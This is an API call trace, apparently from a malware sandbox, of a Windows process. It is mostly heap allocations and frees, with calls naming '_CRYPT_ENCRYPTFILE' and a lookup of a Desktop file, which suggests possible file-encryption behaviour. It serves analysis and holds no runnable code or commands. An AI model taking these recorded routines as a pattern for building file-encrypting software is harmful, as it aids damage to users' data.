RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0129.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0129.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.426] FreeLibrary (hLibModule=0x772d0000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0129.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.428] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 1 [0129.428] TranslateMessage (lpMsg=0x144e9a4) returned 0 [0129.428] DispatchMessageW (lpMsg=0x144e9a4) returned 0x0 [0129.428] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0129.428] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0129.428] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.429] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0129.429] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0129.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0129.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0129.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0129.432] CloseHandle (hObject=0x2a0) returned 1 [0129.432] FreeLibrary (hLibModule=0x772d0000) returned 1 [0129.432] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0129.432] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c93870, ftCreationTime.dwHighDateTime=0x1d5f0f3, ftLastAccessTime.dwLowDateTime=0x510b6f50, ftLastAccessTime.dwHighDateTime=0x1d5f0ad, ftLastWriteTime.dwLowDateTime=0x510b6f50, ftLastWriteTime.dwHighDateTime=0x1d5f0ad, nFileSizeHigh=0x0, nFileSizeLow=0x7203, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="1aQmLq17nlG1P.bmp", cAlternateFileName="1AQMLQ~1.BMP")) returned 0x41ac140 [0129.433] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0129.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0129.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0129.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0129.434] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.435] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0129.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.435] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0129.435] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0129.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0129.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.437] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 